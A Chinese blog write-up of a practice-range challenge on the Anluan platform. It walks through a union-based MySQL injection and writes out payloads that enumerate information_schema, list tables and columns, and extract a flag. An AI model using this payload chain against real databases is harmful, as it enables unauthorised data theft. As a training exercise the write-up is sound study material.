0
点赞
收藏
分享

微信扫一扫

安鸾渗透实战平台|SQL数字型注入详细教程

月白色的大狒 2022-05-06 阅读 102

文章目录


安鸾渗透实战平台|SQL数字型注入详细教程

前言

提示:这里可以添加本文要记录的大概内容:

主要是针对于Mysql 5.0版本即以上的sql注入漏洞的利用


提示:以下是本篇文章正文内容,下面案例可供参考

一、Mysql默认的information库基本

结构

1.schemata表内容

	该表记录数据库内全部的库名称,并且不重复。此处重点使用**Schema_name**

2.tables表内容

该表记录数据库内的库民、表名、字段,内容存在重复。此处重点使用**table_name**

3.columns表内容

该表记录数据库库名、表名、字段名,一一对应。此处重点使用Column_name

二、渗透靶场地址

http://47.103.94.191:8034/

三、mysql渗透步骤

1.进入靶场,查看页面基本信息

在这里插入图片描述

2.判断是否存在注入

3.判断是否存在 符号过滤

4.判断数据库字段列名数量

结果为:
在这里插入图片描述

5.使用联合查询判断显位点

 -1'  union select 1,2,3 ,4,5,6,7,8,9,10,11,12,13,14 #

结果为:
在这里插入图片描述
通过语句判错的方式找到显位点为3,9

6.基本信息收集

 **1'  union select 1,2,version(),4,5,6,7,8,database(),10,11,12,13,14 #**

结果为:
在这里插入图片描述

7.查询指定数据(cms)库下所有的表名

**1' union select 1,2,binary(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14  from information_schema.tables where table_schema like 'cms'#**

结果为:
在这里插入图片描述

8.查询指定表明下的所有字段名

**1'  union select 1,2,binary(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14 from information_schema.columns where table_name like 'this_is_flag'#**

结果为:
在这里插入图片描述

9.查询具体信息

1'  union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#

结果为:
在这里插入图片描述

四、总结

提示:这里对文章进行总结:
第一次写write up,不足之处还请各位大佬批评指出。本次sql注入很轻松完成,最后注意查询具体信息时语句为:

1'  union select 1,2,binary(id),4,5,6,7,8,binary(flag),10,11,12,13,14 from this_is_flag#

为什么不是’this_is_flag’而是this_is_flag?值得思考

举报

相关推荐

0 条评论